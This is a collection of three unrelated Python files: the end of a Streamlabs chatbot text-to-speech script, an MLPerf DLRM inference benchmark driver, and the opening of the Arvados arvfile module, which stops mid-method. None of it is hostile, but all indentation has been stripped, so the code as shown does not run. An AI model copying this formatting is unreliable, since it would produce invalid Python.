l = ["Discord Whisper", "Whisper Both", "All", "Discord Both"]
if usedWhisper and (Usage in l):
return True
if SendResponse:
message = UsageResponse.format(user=data.UserName, usage=Usage)
SendResp(data, message)
return False
def HasPermission(data, permission, permissionInfo):
"""Returns true if user has permission and false if user doesn't"""
if not Parent.HasPermission(data.User, permission, permissionInfo):
return False
return True
def IsOnCooldown(data, command, casterCD, useCD, cooldownMessage, userCooldownMessage):
"""Return true if command is on cooldown and send cooldown message if enabled"""
#introduce globals for cooldown management
cooldown = Parent.IsOnCooldown(ScriptName, command)
userCooldown = Parent.IsOnUserCooldown(ScriptName, command, data.User)
caster = (Parent.HasPermission(data.User, "Caster", "") and casterCD)
#check if command is on cooldown
if (cooldown or userCooldown) and caster is False:
#check if cooldown message is enabled
if useCD:
#set variables for cooldown
cooldownDuration = Parent.GetCooldownDuration(ScriptName, command)
userCDD = Parent.GetUserCooldownDuration(ScriptName, command, data.User)
#check for the longest CD!
if cooldownDuration > userCDD:
#set cd remaining
m_CooldownRemaining = cooldownDuration
#send cooldown message
message = cooldownMessage.format(user=data.UserName, cooldown=m_CooldownRemaining)
SendResp(data, message)
else: #set cd remaining
m_CooldownRemaining = userCDD
#send usercooldown message
message = userCooldownMessage.format(user=data.UserName, cooldown=m_CooldownRemaining)
SendResp(data, message)
return True
return False
def HasCurrency(data, cost):
if (cost == 0) or (Parent.RemovePoints(data.User, data.UserName, cost)):
return True
return False
#---------------------------------------
# Chatbot Tick Function
#---------------------------------------
def Tick():
# End of Tick
return
#---------------------------------------
# Chatbot Parameter Parser
#---------------------------------------
def Parse(parseString, user, target, message):
result = RegTTS.search(parseString)
if result:
paramMessage = result.group(0)
ttsMessage = result.group("message")
parseString = parseString.replace(paramMessage, "")
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, ttsMessage, False))
messageThread.daemon = True
messageThread.start()
# Return unaltered parseString
return parseString
#---------------------------------------
# Chatbot Button Function
#---------------------------------------
def OpenOverlayFolder():
"""Open the overlay folder in the scripts folder"""
os.startfile(os.path.join(os.path.dirname(__file__), "overlay"))
def OpenReadMe():
"""Open the README.txt in the scripts folder"""
os.startfile(os.path.join(os.path.dirname(__file__), "README.txt"))
def OpenBannedWordFile():
"""Open the banned.txt in the scripts folder"""
os.startfile(BannedWordFile)
def OpenBannedUserFile():
"""Open the users.txt in the scripts folder"""
os.startfile(BannedUserFile)
def OpenAnimateDemo():
"""Open Animation Demo Website"""
OpenLink("https://daneden.github.io/animate.css/")
def OpenSocketToken():
"""Open Streamlabs API Settings"""
OpenLink("https://streamlabs.com/dashboard#/settings/api-settings")
def OpenGithubRepository():
"""Open the GitHub Repository for this script"""
OpenLink("https://github.com/kruiser8/TTS-Alerts-And-Chat")
def OpenTwitter():
"""Open the Twitter of the author"""
OpenLink("https://twitter.com/kruiser8")
def OpenLink(link):
"""Open links through buttons in UI"""
os.system("explorer " + link)
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import criteo
# add dlrm code path
try:
dlrm_dir_path = os.environ['DLRM_DIR']
sys.path.append(dlrm_dir_path)
except KeyError:
print("ERROR: Please set DLRM_DIR environment variable to the dlrm code location")
sys.exit(0)
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"kaggle":
(criteo.Criteo, criteo.pre_process_criteo_dlrm, criteo.DlrmPostProcess(),
{"randomize": 'total', "memory_map": True}),
"terabyte":
(criteo.Criteo, criteo.pre_process_criteo_dlrm, criteo.DlrmPostProcess(),
{"randomize": 'total', "memory_map": True}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 2048,
},
"dlrm-kaggle-pytorch": {
"dataset": "kaggle",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 128,
},
"dlrm-terabyte-pytorch": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 2048,
},
"dlrm-kaggle-onnxruntime": {
"dataset": "kaggle",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "onnxruntime",
"model": "dlrm",
"max-batchsize": 128,
},
"dlrm-terabyte-onnxruntime": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "onnxruntime",
"model": "dlrm",
"max-batchsize": 2048,
},
}
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--model", help="name of the mlperf model, ie. dlrm")
parser.add_argument("--model-path", required=True, help="path to the model file")
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--test-num-workers", type=int, default=0, help='# of workers reading the data')
parser.add_argument("--max-ind-range", type=int, default=-1)
parser.add_argument("--data-sub-sample-rate", type=float, default=0.0)
parser.add_argument("--mlperf-bin-loader", action='store_true', default=False)
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--output", help="test results")
parser.add_argument("--inputs", help="model inputs (currently not used)")
parser.add_argument("--outputs", help="model outputs (currently not used)")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--use-gpu", action="store_true", default=False)
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--cache", type=int, default=0, help="use cache (currently not used)")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", help="enable finding peak performance pass")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--duration", type=int, help="duration in milliseconds (ms)")
parser.add_argument("--target-qps", type=int, help="target/expected qps")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument("--count-samples", type=int, help="dataset items to use")
parser.add_argument("--count-queries", type=int, help="number of queries to use")
parser.add_argument("--samples-per-query-multistream", type=int, help="query length for multi-stream scenario (in terms of aggregated samples)")
# --samples-per-query-offline is equivalent to perf_sample_count
parser.add_argument("--samples-per-query-offline", type=int, default=2048, help="query length for offline scenario (in terms of aggregated samples)")
parser.add_argument("--samples-to-aggregate-fix", type=int, help="number of samples to be treated as one")
parser.add_argument("--samples-to-aggregate-min", type=int, help="min number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-max", type=int, help="max number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-quantile-file", type=str, help="distribution quantile used to generate number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-trace-file", type=str, default="dlrm_trace_of_aggregated_samples.txt")
parser.add_argument("--numpy-rand-seed", type=int, default=123)
args = parser.parse_args()
# set random seed
np.random.seed(args.numpy_rand_seed)
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend, dataset, max_ind_range, data_sub_sample_rate, use_gpu):
if backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
# NOTE: pass model parameters here, the following options are available
if dataset == "kaggle":
# 1. Criteo Kaggle Display Advertisement Challenge Dataset (see ./bench/dlrm_s_criteo_kaggle.sh)
backend = BackendPytorchNative(
m_spa=16,
ln_emb=np.array([1460,583,10131227,2202608,305,24,12517,633,3,93145,5683,8351593,3194,27,14992,5461306,10,5652,2173,4,7046547,18,15,286181,105,142572]),
ln_bot=np.array([13,512,256,64,16]),
ln_top=np.array([367,512,256,1]),
use_gpu=use_gpu
)
elif dataset == "terabyte":
if max_ind_range == 10000000:
# 2. Criteo Terabyte (see ./bench/dlrm_s_criteo_terabyte.sh [--sub-sample=0.875] --max-in-range=10000000)
backend = BackendPytorchNative(
m_spa=64,
ln_emb=np.array([9980333,36084,17217,7378,20134,3,7112,1442,61, 9758201,1333352,313829,10,2208,11156,122,4,970,14, 9994222, 7267859, 9946608,415421,12420,101, 36]),
ln_bot=np.array([13,512,256,64]),
ln_top=np.array([415,512,512,256,1]),
use_gpu=use_gpu
)
elif max_ind_range == 40000000:
# 3. Criteo Terabyte MLPerf training (see ./bench/run_and_time.sh --max-in-range=40000000)
backend = BackendPytorchNative(
m_spa=128,
ln_emb=np.array([39884406,39043,17289,7420,20263,3,7120,1543,63,38532951,2953546,403346,10,2208,11938,155,4,976,14,39979771,25641295,39664984,585935,12972,108,36]),
ln_bot=np.array([13,512,256,128]),
ln_top=np.array([479,1024,1024,512,256,1]),
use_gpu=use_gpu
)
else:
raise ValueError("only --max-in-range 10M or 40M is supported")
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
# NOTE: pass model parameters here, the following options are available
if dataset == "kaggle":
# 1. Criteo Kaggle Display Advertisement Challenge Dataset (see ./bench/dlrm_s_criteo_kaggle.sh)
backend = BackendOnnxruntime(
m_spa=16,
ln_emb=np.array([1460,583,10131227,2202608,305,24,12517,633,3,93145,5683,8351593,3194,27,14992,5461306,10,5652,2173,4,7046547,18,15,286181,105,142572]),
ln_bot=np.array([13,512,256,64,16]),
ln_top=np.array([367,512,256,1]),
use_gpu=use_gpu
)
elif dataset == "terabyte":
if max_ind_range == 10000000:
# 2. Criteo Terabyte (see ./bench/dlrm_s_criteo_terabyte.sh [--sub-sample=0.875] --max-in-range=10000000)
backend = BackendOnnxruntime(
m_spa=64,
ln_emb=np.array([9980333,36084,17217,7378,20134,3,7112,1442,61, 9758201,1333352,313829,10,2208,11156,122,4,970,14, 9994222, 7267859, 9946608,415421,12420,101, 36]),
ln_bot=np.array([13,512,256,64]),
ln_top=np.array([415,512,512,256,1]),
use_gpu=use_gpu
)
elif max_ind_range == 40000000:
# 3. Criteo Terabyte MLPerf training (see ./bench/run_and_time.sh --max-in-range=40000000)
backend = BackendOnnxruntime(
m_spa=128,
ln_emb=np.array([39884406,39043,17289,7420,20263,3,7120,1543,63,38532951,2953546,403346,10,2208,11938,155,4,976,14,39979771,25641295,39664984,585935,12972,108,36]),
ln_bot=np.array([13,512,256,128]),
ln_top=np.array([479,1024,1024,512,256,1]),
use_gpu=use_gpu
)
else:
raise ValueError("only --max-in-range 10M or 40M is supported")
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, batch_dense_X, batch_lS_o, batch_lS_i, batch_T=None, idx_offsets=None):
self.query_id = query_id
self.content_id = content_id
self.batch_dense_X = batch_dense_X
self.batch_lS_o = batch_lS_o
self.batch_lS_i = batch_lS_i
self.batch_T = batch_T
self.idx_offsets = idx_offsets
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict(qitem.batch_dense_X, qitem.batch_lS_o, qitem.batch_lS_i)
processed_results = self.post_process(results, qitem.batch_T, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
log.error("thread: failed, %s", ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
# NOTE: processed_results returned by DlrmPostProcess store both
# result = processed_results[idx][0] and target = processed_results[idx][1]
# also each idx might be a query of samples, rather than a single sample
# depending on the --samples-to-aggregate* arguments.
s_idx = qitem.idx_offsets[idx]
e_idx = qitem.idx_offsets[idx + 1]
# debug prints
# print("s,e:",s_idx,e_idx, len(processed_results))
response_array = array.array("B", np.array(processed_results[s_idx:e_idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
query_len = len(query_samples)
if query_len < self.max_batchsize:
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
else:
bs = self.max_batchsize
for i in range(0, query_len, bs):
ie = min(i + bs, query_len)
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx[i:ie])
self.run_one_item(Item(query_id[i:ie], idx[i:ie], batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
queue_size_multiplier = 4 #(args.samples_per_query_offline + max_batchsize - 1) // max_batchsize)
self.tasks = Queue(maxsize=threads * queue_size_multiplier)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent want us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
query_len = len(query_samples)
if query_len < self.max_batchsize:
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
else:
bs = self.max_batchsize
for i in range(0, query_len, bs):
ie = min(i + bs, query_len)
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "roc_auc" in result_dict:
result["roc_auc"] = 100. * result_dict["roc_auc"]
acc_str += ", auc={:.3f}%".format(result["roc_auc"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend, args.dataset, args.max_ind_range, args.data_sub_sample_rate, args.use_gpu)
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
# --count-samples can be used to limit the number of samples used for testing
ds = wanted_dataset(data_path=args.dataset_path,
name=args.dataset,
pre_process=pre_proc, # currently an identity function
use_cache=args.cache, # currently not used
count=args.count_samples,
samples_to_aggregate_fix=args.samples_to_aggregate_fix,
samples_to_aggregate_min=args.samples_to_aggregate_min,
samples_to_aggregate_max=args.samples_to_aggregate_max,
samples_to_aggregate_quantile_file=args.samples_to_aggregate_quantile_file,
samples_to_aggregate_trace_file=args.samples_to_aggregate_trace_file,
test_num_workers=args.test_num_workers,
max_ind_range=args.max_ind_range,
sub_sample_rate=args.data_sub_sample_rate,
mlperf_bin_loader=args.mlperf_bin_loader,
**kwargs)
# load model to backend
model = backend.load(args.model_path, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
batch_dense_X, batch_lS_o, batch_lS_i, _, _ = ds.get_samples([0])
_ = backend.predict(batch_dense_X, batch_lS_o, batch_lS_i)
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_name, args.scenario)
settings.FromConfig(user_conf, args.model_name, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.duration:
settings.min_duration_ms = args.duration
settings.max_duration_ms = args.duration
if args.target_qps:
settings.server_target_qps = float(args.target_qps)
settings.offline_expected_qps = float(args.target_qps)
if args.count_queries:
settings.min_query_count = args.count_queries
settings.max_query_count = args.count_queries
if args.samples_per_query_multistream:
settings.multi_stream_samples_per_query = args.samples_per_query_multistream
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, args.samples_per_query_offline), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "roc_auc": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=args.output)
add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
arvfile.py
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
from __future__ import absolute_import
from __future__ import division
from future import standard_library
from future.utils import listitems, listvalues
standard_library.install_aliases()
from builtins import range
from builtins import object
import bz2
import collections
import copy
import errno
import functools
import hashlib
import logging
import os
import queue
import re
import sys
import threading
import uuid
import zlib
from . import config
from .errors import KeepWriteError, AssertionError, ArgumentError
from .keep import KeepLocator
from ._normalize_stream import normalize_stream
from ._ranges import locators_and_ranges, replace_range, Range, LocatorAndRange
from .retry import retry_method
MOD = "mod"
WRITE = "write"
_logger = logging.getLogger('arvados.arvfile')
def split(path):
"""split(path) -> streamname, filename
Separate the stream name and file name in a /-separated stream path and
return a tuple (stream_name, file_name). If no stream name is available,
assume '.'.
"""
try:
stream_name, file_name = path.rsplit('/', 1)
except ValueError: # No / in string
stream_name, file_name = '.', path
return stream_name, file_name
class UnownedBlockError(Exception):
"""Raised when there's an writable block without an owner on the BlockManager."""
pass
class _FileLikeObjectBase(object):
def __init__(self, name, mode):
self.name = name
self.mode = mode
self.closed = False
@staticmethod
def _before_close(orig_func):
@functools.wraps(orig_func)
def before_close_wrapper(self, *args, **kwargs):
if self.closed:
raise ValueError("I/O operation on closed stream file")
return orig_func(self, *args, **kwargs)
return before_close_wrapper
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.close()
except Exception:
if exc_type is None:
raise
def close(self):
self.closed = True
class ArvadosFileReaderBase(_FileLikeObjectBase):
def __init__(self, name, mode, num_retries=None):
super(ArvadosFileReaderBase, self).__init__(name, mode)
self._filepos = 0
self.num_retries = num_retries
self._readline_cache = (None, None)
def __iter__(self):
while True:
data = self.readline()
if not data:
break
yield data
def decompressed_name(self):
return re.sub('\.(bz2|gz)$', '', self.name)
@_FileLikeObjectBase._before_close
def seek(self, pos, whence=os.SEEK_SET):
if whence == os.SEEK_CUR:
pos += self._filepos
elif whence == os.SEEK_END:
pos += self.size()
if pos < 0:
raise IOError(errno.EINVAL, "Tried to seek to negative file offset.")
self._filepos = pos
return self._filepos
def tell(self):
return self._filepos
def readable(self):
return True
def writable(self):
return False
def seekable(self):
return True
@_FileLikeObjectBase._before_close
@retry_method
def readall(self, size=2**20, num_retries=None):
while True:
data = self.read(size, num_retries=num_retries)
if len(data) == 0:
break
yield data
@_FileLikeObjectBase._before_close
@retry_method
def readline(self, size=float('inf'), num_retries=None):
cache_pos, cache_data = self._readline_cache
if self.tell() == cache_pos:
data = [cache_data]
self._filepos += len(cache_data)
else:
data = [b'']
data_size = len(data[-1])
while (data_size < size) and (b'\n' not in data[-1]):
next_read = self.read(2 ** 20, num_retries=num_retries)
if not next_read:
break
data.append(next_read)
data_size += len(next_read)
data = b''.join(data)
try:
nextline_index = data.index(b'\n') + 1
except ValueError:
nextline_index = len(data)
nextline_index = min(nextline_index, size)
self._filepos -= len(data) - nextline_index
self._readline_cache = (self.tell(), data[nextline_index:])
return data[:nextline_index].decode()
@_FileLikeObjectBase._before_close
@retry_method
def decompress(self, decompress, size, num_retries=None):
for segment in self.readall(size, num_retries=num_retries):
data = decompress(segment)
if data:
yield data
@_FileLikeObjectBase._before_close
@retry_method
def readall_decompressed(self, size=2**20, num_retries=None):
self.seek(0)
if self.name.endswith('.bz2'):
dc = bz2.BZ2Decompressor()
return self.decompress(dc.decompress, size,
num_retries=num_retries)
elif self.name.endswith('.gz'):
dc = zlib.decompressobj(16+zlib.MAX_WBITS)
return self.decompress(lambda segment: dc.decompress(dc.unconsumed_tail + segment),
size, num_retries=num_retries)
else:
return self.readall(size, num_retries=num_retries)
@_FileLikeObjectBase._before_close
@retry_method
def readlines(self, sizehint=float('inf'), num_retries=None):
data = []
data_size = 0
for s in self.readall(num_retries=num_retries):
data.append(s)
data_size += len(s)
if data_size >= sizehint:
break
return b''.join(data).decode().splitlines(True)
def size(self):
raise IOError(errno.ENOSYS, "Not implemented")
def read(self, size, num_retries=None):
raise IOError(errno.ENOSYS, "Not implemented")
def readfrom(self, start, size, num_retries=None):
raise IOError(errno.ENOSYS, "Not implemented")
class StreamFileReader(ArvadosFileReaderBase):
class _NameAttribute(str):
# The Python file API provides a plain .name attribute.
# Older SDK provided a name() method.
# This class provides both, for maximum compatibility.
def __call__(self):
return self
def __init__(self, stream, segments, name):
super(StreamFileReader, self).__init__(self._NameAttribute(name), 'rb', num_retries=stream.num_retries)
self._stream = stream
self.segments = segments
def stream_name(self):
return self._stream.name()
def size(self):
n = self.segments[-1]
return n.range_start + n.range_size
@_FileLikeObjectBase._before_close
@retry_method
def read(self, size, num_retries=None):
"""Read up to 'size' bytes from the stream, starting at the current file position"""
if size == 0:
return b''
data = b''
available_chunks = locators_and_ranges(self.segments, self._filepos, size)
if available_chunks:
lr = available_chunks[0]
data = self._stream.readfrom(lr.locator+lr.segment_offset,
lr.segment_size,
num_retries=num_retries)
self._filepos += len(data)
return data
@_FileLikeObjectBase._before_close
@retry_method
def readfrom(self, start, size, num_retries=None):
"""Read up to 'size' bytes from the stream, starting at 'start'"""
if size == 0:
return b''
data = []
for lr in locators_and_ranges(self.segments, start, size):
data.append(self._stream.readfrom(lr.locator+lr.segment_offset, lr.segment_size,
num_retries=num_retries))
return b''.join(data)
def as_manifest(self):
segs = []
for r in self.segments:
segs.extend(self._stream.locators_and_ranges(r.locator, r.range_size))
return " ".join(normalize_stream(".", {self.name: segs})) + "\n"
def synchronized(orig_func):
@functools.wraps(orig_func)
def synchronized_wrapper(self, *args, **kwargs):
with self.lock:
return orig_func(self, *args, **kwargs)
return synchronized_wrapper
class StateChangeError(Exception):
def __init__(self, message, state, nextstate):
super(StateChangeError, self).__init__(message)
self.state = state
self.nextstate = nextstate
class _BufferBlock(object):
"""A stand-in for a Keep block that is in the process of being written.
Writers can append to it, get the size, and compute the Keep locator.
There are three valid states:
WRITABLE
Can append to block.
PENDING
Block is in the process of being uploaded to Keep, append is an error.
COMMITTED
The block has been written to Keep, its internal buffer has been
released, fetching the block will fetch it via keep client (since we
discarded the internal copy), and identifiers referring to the BufferBlock
can be replaced with the block locator.
"""
WRITABLE = 0
PENDING = 1
COMMITTED = 2
ERROR = 3
DELETED = 4
def __init__(self, blockid, starting_capacity, owner):
"""
:blockid:
the identifier for this block
:starting_capacity:
the initial buffer capacity
:owner:
ArvadosFile that owns this block
"""
self.blockid = blockid
self.buffer_block = bytearray(starting_capacity)
self.buffer_view = memoryview(self.buffer_block)
self.write_pointer = 0
self._state = _BufferBlock.WRITABLE
self._locator = None
self.owner = owner
self.lock = threading.Lock()
self.wait_for_commit = threading.Event()
self.error = None
@synchronized
def append(self, data):
"""Append some data to the buffer.
Only valid if the block is in WRITABLE state. Implements an expanding
buffer, doubling capacity as needed to accomdate all the data.
"""
if self._state == _BufferBlock.WRITABLE:
if not isinstance(data, bytes) and not isinstance(data, memoryview):
data = data.encode()
while (self.write_pointer+len(data)) > len(self.buffer_block):
new_buffer_block = bytearray(len(self.buffer_block) * 2)
new_buffer_block[0:self.write_pointer] = self.buffer_block[0:self.write_pointer]
self.buffer_block = new_buffer_block
self.buffer_view = memoryview(self.buffer_block)
self.buffer_view[self.write_pointer:self.write_pointer+len(data)] = data
self.write_pointer += len(data)
self._locator = None
else:
raise AssertionError("Buffer block is not writable")
STATE_TRANSITIONS = frozenset([
(WRITABLE, PENDING),
(PENDING, COMMITTED),
(PENDING, ERROR),
(ERROR, PENDING)])
@synchronized
def set_state(self, nextstate, val=None):
if (self._state, nextstate) not in self.STATE_TRANSITIONS:
raise StateChangeError("Invalid state change from %s to %s" % (self._state, nextstate), self._state, nextstate)
self._state = nextstate
if self._state == _BufferBlock.PENDING:
self.wait_for_commit.clear()
if self._state == _BufferBlock.COMMITTED:
self._locator = val
self.buffer_view = None
self.buffer_block = None
self.wait_for_commit.set()
if self._state == _BufferBlock.ERROR:
self.error = val
self.wait_for_commit.set()
@synchronized
def state(self):
return self._state
def size(self):
"""The amount of data written to the buffer."""
return self.write_pointer
@synchronized
def locator(self):
"""The Keep locator for this buffer's contents."""
if self._locator is None:
self._locator = "%s+%i" % (hashlib.md5(self.buffer_view[0:self.write_pointer]).hexdigest(), self.size())
return self._locator
@synchronized
def clone(self, new_blockid, owner):
if self._state == _BufferBlock.COMMITTED:
raise AssertionError("Cannot duplicate committed buffer block")
bufferblock = _BufferBlock(new_blockid, self.size(), owner)
bufferblock.append(self.buffer_view[0:self.size()])
return bufferblock
@synchronized
def clear(self):
self._state = _BufferBlock.DELETED
self.owner = None
self.buffer_block = None
self.buffer_view = None
@synchronized
def repack_writes(self):
"""Optimize buffer block by repacking segments in file sequence.
When the client makes random writes, they appear in the buffer block in
the sequence they were written rather than the sequence they appear in
the file. This makes for inefficient, fragmented manifests. Attempt
to optimize by repacking writes in file sequence.
"""
if self._state != _BufferBlock.WRITABLE:
